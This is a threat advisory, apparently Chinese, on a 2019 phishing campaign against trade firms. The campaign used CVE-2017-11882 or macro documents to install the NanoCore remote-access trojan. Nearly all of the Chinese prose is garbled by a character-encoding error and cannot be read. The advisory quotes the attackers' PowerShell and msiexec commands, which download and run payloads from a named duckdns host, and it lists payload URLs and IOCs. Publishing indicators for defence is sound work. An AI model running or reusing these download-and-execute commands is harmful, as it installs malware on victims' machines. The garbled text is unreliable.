SectorH01¹¥»÷×éÖ¯´¹ÂÚÓʼþÊÂÎñÇ徲ͨ¸æ
Ðû²¼Ê±¼ä 2019-09-22ÊÂÎñÅä¾°
½üÆÚ¼ì²âµ½SectorH01¹¥»÷×éÖ¯¡°ÉÌóÐÅ¡±´¹ÂÚÓʼþ¹¥»÷ÔÚ9Ô·ºÆðÐÂÒ»ÂÖÔöÌí¡£¡£¡£Ôڴ˴ι¥»÷ÖУ¬£¬£¬£¬£¬£¬ºÚ¿ÍÈ«ÐĽṹµÄ´øÓÐoffice¹«Ê½±à¼Æ÷Îó²îCVE-2017-11882»òºê´úÂëµÄ¶ñÒâÎĵµ£¬£¬£¬£¬£¬£¬½«Æä×÷Ϊ¸½¼þÅúÁ¿·¢ËÍÖÁÍâóÐÐÒµÆóÒµÓÊÏäÖУ¬£¬£¬£¬£¬£¬ÔÚÆä·¿ªÎĵµÖÐÕкóÖ²ÈëÔ¶¿ØÄ¾ÂíNanoCore¾ÙÐÐÉñÃØÐÅÏ¢ÇÔÈ¡ºÍÔ¶³Ì¿ØÖÆ£¬£¬£¬£¬£¬£¬±¾´Î¹¥»÷á¯ÁëʱÆÚÌìÌìÀÖ³ÉͶµÝ³¬3000¸öÓʼþµØµã¡£¡£¡£
ÊÂÎñÐÎò
ƾ֤ͳ¼ÆÊý¾Ý£¬£¬£¬£¬£¬£¬ÓÐÁè¼Ý1000¼ÒÆóÒµÊܵ½´Ë´Î¹¥»÷Ó°Ï죬£¬£¬£¬£¬£¬ÆäÖнüÒ»°ëÒÔÉÏÂþÑÜÔڹ㶫¡¢½ËÕ¡¢Õ㽺ÍÉϺ£Ëĵأ¬£¬£¬£¬£¬£¬ÆäÖй㶫ռ±ÈÁè¼Ý30%¡£¡£¡£ÌØÊâÊǹ㶫ÉîÛںͶ«Ý¸ÓÉÓÚÖÆÔìÒµºÍÍâóÐÐÒµ÷缯£¬£¬£¬£¬£¬£¬³ÉΪ±¾´Î¹¥»÷Êܺ¦×îÑÏÖØµÄÇøÓò¡£¡£¡£
´ÓÐÐÒµÂþÑÜÀ´¿´£¬£¬£¬£¬£¬£¬¡°ÉÌóÐÅ¡±¹¥»÷Ä¿µÄÖ÷Òª¼¯ÖÐÔÚ¹¤ÒµÖÆÔì¼°ÉÌÒµÐÐÒµ¡£¡£¡£Í³¼ÆÊý¾ÝÏÔʾ£¬£¬£¬£¬£¬£¬±»¹¥»÷µÄ88%ÎªÖÆÔìÒµ£¬£¬£¬£¬£¬£¬Ê£Óà12%ÊÇÓëÖÆÔìÒµÌṩÏà¹ØÁªµÄÏúÊÛ¡¢ÔËÊä¡¢ÉÌÎñЧÀÍÐÐÒµ¡£¡£¡£
ÊÂÎñÆÊÎö
´¹ÂÚÓʼþÖ÷Ҫͨ¹ýαÔìÒÔÏ·¢¼þÓÊÏä¾ÙÐз¢ËÍ£¬£¬£¬£¬£¬£¬ÆäÖÐʹÓÃ×î¶àµÄΪ
kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com
pk3195@dataone.in
ÒÔÆäÖÐÒ»·âÓʼþΪÀý£¬£¬£¬£¬£¬£¬´ÓÓʼþÍ·²¿ÐÅÏ¢ÖпÉÒÔ¿´µ½·¢¼þÈËΪ¡°Keith Ward/SDG /UK¡±£¬£¬£¬£¬£¬£¬·¢¼þÓÊÏ䵨µãΪkieth@sdgtrading.co.uk¡£¡£¡£sdgtradingÊÇÒ»¼Ò×ܲ¿Î»ÓÚÓ¢¹úµÄÊÕÖ§¿ÚÉÌÒµ¹«Ë¾£¬£¬£¬£¬£¬£¬ÏÖÔÚ·¿ª¸Ã¹«Ë¾¹Ù·½ÍøÕ¾¿ÉÒÔÕý³£»á¼û¡£¡£¡£
ÉÌÒµ¹«Ë¾ÏúÊÛÖ°Ô±ÐÅÏ¢
´¹ÂÚÓʼþ
¡°¶©¹º¡±¡¢¡°¼ÛÇ®¡±¡¢¡°¼ÛÄ¿±í¡±¡¢¡°ÏúÊÛÌõ¼þ¡±¡¢¡°ÕÛ¿Û¡±¡¢¡°×°ÔËÈÕÆÚ¡±¡¢¡°²É¹º¹æ¸ñ¡±µÈ¡£¡£¡£
ÓʼþÖл¹Ö¸³öÓʼþ¸½¼þÖаüÀ¨¡°ÏëÒª²É¹ºµÄ²úÆ·ÌõÄ¿¡±Îĵµ£¬£¬£¬£¬£¬£¬ÇëÔĶÁºó¾ÙÐлظ´£¬£¬£¬£¬£¬£¬²¿·ÖÎĵµÃûÈçÏ£º
RFQ015770082.doc
ÆÊÎö·¢Ã÷£¬£¬£¬£¬£¬£¬¸½¼þÎĵµÖаüÀ¨Office¹«Ê½±à¼Æ÷Îó²îCVE-2017-11882ʹÓôúÂë»ò¶ñÒâºê´úÂ룬£¬£¬£¬£¬£¬¾ÓÉÎó²î¹¥»÷»òºê´úÂëÖ´ÐÐÀú³Ì£¬£¬£¬£¬£¬£¬»á´¥·¢ÓÃÓÚÏÂÔØÄ¾ÂíµÄPowershellÏÂÁîÖ´ÐУ¬£¬£¬£¬£¬£¬½øÒ»²½ÏÂÔØÄ¾Âí£º
'cmd.exe /c PowerShell "try{$tA=$env:temp+\'\\fo.exe\';Import-Module BitsTransfer;Start-BitsTransfer -Source \'hxxps://oppofile.duckdns.org/a/gmb.exe\' -Destination $tA;(New-Object -com Shell.Application).ShellExecute( $tA);}catch{}"'
³ýÁËʹÓÃPowershell£¬£¬£¬£¬£¬£¬ÉÐÓв¿·Ö¹¥»÷ÖÐʹÓÃWindows×°ÖóÌÐò(msiexec.exe)×°ÖÃMSI°üÎļþ¾ÙÐÐľÂíÏÂÔØ£º
msiEXEc /i http[:]//oppofile.duckdns.org/d/dar.msi
´ÓÏÖÔÚ²¶»ñµ½µÄ¹¥»÷ÎĵµÖÐÎÒÃÇ·¢Ã÷ÓÐÒÔÏÂľÂíÏÂÔØµØµã£º
hxxp://oppofile.duckdns.org/c/dar.exe
hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/go.exe
hxxps://oppofile.duckdns.org/a/gmb.exe
hxxps://oppofile.duckdns.org/a/alex.exe
hxxp://oppofile.duckdns.org/d/dar.msi
hxxp://oppofile.duckdns.org/e/scan.msi
hxxp://oppofile.duckdns.org/e/gmb.msi
Ô¶¿ØÄ¾Âí
±»ÏÂÔØÖ²ÈëµÄÏÖʵÉÏÊǵľÓÉ»ìÏýµÄÔ¶¿ØÄ¾ÂíNanoCore£¬£¬£¬£¬£¬£¬NanoCoreÊÇʹÓÃ.NetÓïÑÔ±àдµÄ¹¦Ð§Ç¿Ê¢µÄÔ¶³Ì»á¼û¿ØÖÆÄ¾Âí£¨RAT£©£¬£¬£¬£¬£¬£¬¿ÉÒÔÔÚÄ¿µÄÖ÷»úÉϾÙÐÐÎļþ²Ù×÷£¬£¬£¬£¬£¬£¬ÆÁÄ»¿ØÖÆ£¬£¬£¬£¬£¬£¬ÔËÐÐÖ¸¶¨³ÌÐò£¬£¬£¬£¬£¬£¬»¹Ö§³Ö²å¼þÀ©Õ¹¹¦Ð§£¬£¬£¬£¬£¬£¬±»Ñ¬È¾NanoCoreľÂíµÄµçÄԻ᷺ÆðÑÏÖØÐÅϢй¶£¬£¬£¬£¬£¬£¬¹¥»÷Õß»¹¿ÉÒÔʹÓÃÖж¾µçÄÔÎªÌø°å£¬£¬£¬£¬£¬£¬¶ÔÄ¿µÄÍøÂç¼ÌÐø¾ÙÐÐÉøÍ¸ÈëÇÖ¡£¡£¡£
½¹µãÄ£¿£¿£¿é±»¼ÓÃܺóÒÔλͼÃûÌÃÉúÑÄÔÚ×ÊÔ´Îļþ
Ⱥ·¢Èí¼þ
ÎÒÃÇÏÂÔØ¸ÃÈí¼þ£¬£¬£¬£¬£¬£¬²¢¾ÙÐÐ×¢²áºÍÊÔÓᣡ£¡£Æ¾Ö¤Æä½çÃæÕ¹Ê¾µÄ¹¦Ð§£¬£¬£¬£¬£¬£¬Ö»Ðè±àдºÃÓʼþÄÚÈÝ(í§ÒâÌîд·¢¼þÈËÐÕÃû)¡¢ÅúÁ¿Ìí¼ÓÊÕ¼þÈ˵ص㡢µã»÷¡°×îÏÈȺ·¢¡±Èý²½£¬£¬£¬£¬£¬£¬¼´¿É½«Óʼþ¿ìËÙ·¢ËÍÖÁ´óÅúµÄÄ¿µÄÓÊÏäÖС£¡£¡£
¸ÃÈí¼þÉÐÓÐÒ»¸öÖ÷ÒªµÄ¹¦Ð§ÊÇ£¬£¬£¬£¬£¬£¬Ö§³Ö´ÓÖ¸¶¨ÍøÕ¾ÊÕÂÞÄ¿µÄÓÊÏä¡£¡£¡£¸Ã¹¦Ð§Ò³ÃæÄ¬ÈϵÄÔ´ÍøÕ¾µØµãΪhttp[:]//www.****.biz/¡£¡£¡£ÎÒÃÇʵÑéʹÓøÃÍøÕ¾¾ÙÐÐÓÊÏäÊÕÂÞ£¬£¬£¬£¬£¬£¬ÔÚ10·ÖÖÓÖ®ÄÚ¿ÉÒÔÊÕÂÞµ½½ü800¸öÓÊÏ䵨µã£¬£¬£¬£¬£¬£¬»»ËãºóÒ»¸öСʱ֮ÄÚ¿ÉÒÔÊÕÂÞµ½5000¸öÓÊÏ䣬£¬£¬£¬£¬£¬¶øÕâЩ±»ÊÕÂÞµ½µÄÓÊÏä¶¼±£´æ±»¹¥»÷µÄ¿ÉÄÜ¡£¡£¡£
¿ÉÒÔ¿´µ½Õâ¸öĬÈϵÄÓÊÏäÊÕÂÞÍøÕ¾¡°**Íø¡±(www.*****.biz)ÊÇÒ»¸öÉÌÒµÐÅÏ¢Ðû²¼Æ½Ì¨£¬£¬£¬£¬£¬£¬´ó×Ú³§ÉÌ(»úе¡¢»¯¹¤¡¢µçÆø¡¢ÄÜÔ´¡¢ÒÇÆ÷µÈÐÐÒµ)ÔÚ¸ÃÍøÕ¾ÉÏÐû²¼µÈÖݪֲúÆ·µÄ¹©Ó¦»òÇó¹ºÐÅÏ¢¡£¡£¡£¶øÃ¿Ò»ÌõÐÅÏ¢¶¼»á¸½´ø³§É̵ĵ绰¡¢ÓʱࡢÓÊÏäµÈÁªÏµ·½·¨£¬£¬£¬£¬£¬£¬¡°****ÓʼþȺ·¢Æ÷¡±ÕýÊÇ´ÓÕâЩÐÅÏ¢ÖлñÈ¡ÁË´ó×ÚµÄÓÊÏ䵨µã¡£¡£¡£
¹¥»÷˼Ð÷
´ÓÒÔϼ¸¸ö½Ç¶È£¬£¬£¬£¬£¬£¬ÎÒÃÇÒÔΪºÚ¿ÍʹÓÃÁËÓʼþȺ·¢Èí¼þ¡°****ÓʼþȺ·¢Æ÷¡±¾ÙÐи¨Öú¹¥»÷£º
2¡¢Êܺ¦ÆóÒµÀàÐÍÓë¡°****ÓʼþȺ·¢Æ÷¡±Ä¬ÈÏÊÕÂÞÓÊÏäÀàÐÍÒ»ÖÂ(¹¤ÒµÆ·ÉÌÒµ¹«Ë¾)£»£»£»£»
3¡¢¹¥»÷µÄÓ°Ïì¹æÄ£Óë¸ÃÈí¼þµÄÊÕÂÞÄÜÁ¦ÎǺÏ(Êܺ¦ÓÊÏäÔ¼3000¸ö/ÈÕ & Èí¼þµÄÊÕÂÞÄÜÁ¦Ô¼5000¸ö/Сʱ)¡£¡£¡£
ÍÆ²âºÚ¿ÍʵÑé¹¥»÷µÄ˼Ð÷ÈçÏ£º
1¡¢ºÚ¿ÍÏÂÔØÓʼþȺ·¢Èí¼þ£»£»£»£»
2¡¢½á¹¹´øÓÐCVE-2017-11882Îó²îʹÓÃ(»òÕߺê´úÂë)µÄoffice¶ñÒâÎļþ£»£»£»£»
3¡¢Ê¹ÓÃ****ÓʼþȺ·¢Æ÷´ÓÉÌÒµ·ÖÀàÐÅÏ¢ÍøÕ¾ÅúÁ¿ÊÕÂÞÄ¿µÄÓÊÏ䵨µã£»£»£»£»
4¡¢Ê¹ÓÃ×¼±¸ºÃµÄ¶ñÒâÎĵµ×÷Ϊ¸½¼þ£¬£¬£¬£¬£¬£¬½á¹¹´¹ÂÚÓʼþ²¢ÅúÁ¿·¢ËÍ£»£»£»£»
5¡¢ÆÚ´ýÊÕ¼þÈË·¿ª¸½¼þ²¢ÖÐÕУ¬£¬£¬£¬£¬£¬Í¨¹ýÔ¶¿ØÄ¾ÂíNanoCore¶ÔÄ¿µÄ¾ÙÐÐÔ¶³Ì¿ØÖÆ¡£¡£¡£
×ܽá
Ôڴ˴ι¥»÷ÊÂÎñÖпÉÒÔ·¢Ã÷£¬£¬£¬£¬£¬£¬ºÚ¿ÍÓë»Ò²ú´ÓÒµÖ°Ô±·ºÆðÁ˽»¼¯¡£¡£¡£»£»£»£»Ò²úÖ°Ô±¿ª·¢³öÓʼþȺ·¢¹¤¾ß£¬£¬£¬£¬£¬£¬¹¤¾ß¿ÉÕë¶ÔÍøÕ¾ÉϵĹûÕæÓÊÏä¾ÙÐÐÅÀÈ¡£¡£¡£¬£¬£¬£¬£¬£¬¿ÉʹÓûñÈ¡µ½µÄÓÊÏä¾ÙÐÐÅúÁ¿Èº·¢Óʼþ¡£¡£¡£¹¤¾ßÔÚÆä×¢²áµÄ¡°¹ÙÍø¡±ÉϾÙÐйûÕæÊÛÂô£¬£¬£¬£¬£¬£¬Ê¹ÓÃ˵Ã÷ÖС°ÕýÒ塱µØÌáµ½¡°½öÓÃÓÚÕý¹æÓʼþÓªÏú£¬£¬£¬£¬£¬£¬ÀÄÓÃÕßЧ¹û×Ô×𡱡£¡£¡£µ«¹¤¾ßÒ»µ©ÊÛ³ö£¬£¬£¬£¬£¬£¬±ãÄÑÒÔ°ü¹Ü±»ÓÃÓÚÕýµ±ÓÃ;¡£¡£¡£
¶øºÚ¿Í»ñµÃ´ËÈí¼þºó£¬£¬£¬£¬£¬£¬½«ÆäÄÉÈë¹¥»÷ÎäÆ÷ÖеÄÒ»Ô±¡£¡£¡£Ëæºó£¬£¬£¬£¬£¬£¬Ö»Ðè±àдºÃľÂí£¬£¬£¬£¬£¬£¬½á¹¹´¹ÂÚÓʼþ£¬£¬£¬£¬£¬£¬¾Í¿ÉÒÔʹÓøù¤¾ß½«´¹ÂÚÓʼþ×Ô¶¯»¯¡¢´óÅúÁ¿µØ·¢ËÍÖÁÆóÒµµÄÏà¹ØÓÊÏäÖС£¡£¡£
ÐÞ¸´½¨Òé
1¡¢ÆóÒµÓÊÏäÍø¹Ü½«ÒÔÏ·¢¼þÓÊÏäÉèÖÃΪºÚÃûµ¥
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com
pk3195@dataone.in
2¡¢²»Òª·¿ª²»Ã÷ȪԴµÄÓʼþ¸½¼þ£¬£¬£¬£¬£¬£¬¹ØÓÚ¸½¼þÖеÄÎļþÒªÉóÉ÷ÔËÐУ¬£¬£¬£¬£¬£¬Èç·¢Ã÷Óо籾»òÆäËû¿ÉÖ´ÐÐÎļþ¿ÉÏÈʹÓÃɱ¶¾Èí¼þ¾ÙÐÐɨÃ裻£»£»£»
3¡¢Éý¼¶officeϵÁÐÈí¼þµ½×îа汾£¬£¬£¬£¬£¬£¬ÊµÊ±ÐÞ¸´office³ÌÐòÎó²î£¬£¬£¬£¬£¬£¬²»ÒªËæÒâÔËÐв»¿ÉÐÅÎĵµÖеĺꣻ£»£»£»
4¡¢ÍƼö°²ÅÅÖÕ¶ËÇå¾²ÖÎÀíϵͳ·ÀÓù²¡¶¾Ä¾Âí¹¥»÷£»£»£»£»
5¡¢Ê¹ÓÃÈëÇÖ¼ì²âϵͳ¼ì²âδ֪ºÚ¿ÍµÄÖÖÖÖ¿ÉÒɹ¥»÷ÐÐΪ¡£¡£¡£
IOC
ÓÊÏä
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com
pk3195@dataone.in
Óʼþ¸½¼þ
11dd68ba724a7e34cdab1aae97a93190
3f36befc186d10551b5a4d65ac35978d
e4b1a5e14064e7c716530528e7615374
3f36befc186d10551b5a4d65ac35978d
1ffd02ef62e8feb788968518fe5fbdb2
a9958884c16f17c2c9e4d75f92117352
d6b697c64723909f0b357e2d49948905
a9958884c16f17c2c9e4d75f92117352
NanaCoreľÂí
453a235ad5ea7055f2af2c51c95a5bb2
ÓòÃû
oppofile.duckdns.org
URL
hxxp://oppofile.duckdns.org/c/dar.exe
hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/go.exe
hxxps://oppofile.duckdns.org/a/gmb.exe
hxxps://oppofile.duckdns.org/a/alex.exe
hxxp://oppofile.duckdns.org/d/dar.msi
hxxp://oppofile.duckdns.org/e/scan.msi
hxxp://oppofile.duckdns.org/e/gmb.msi
²Î¿¼Á´½Ó


¾©¹«Íø°²±¸11010802024551ºÅ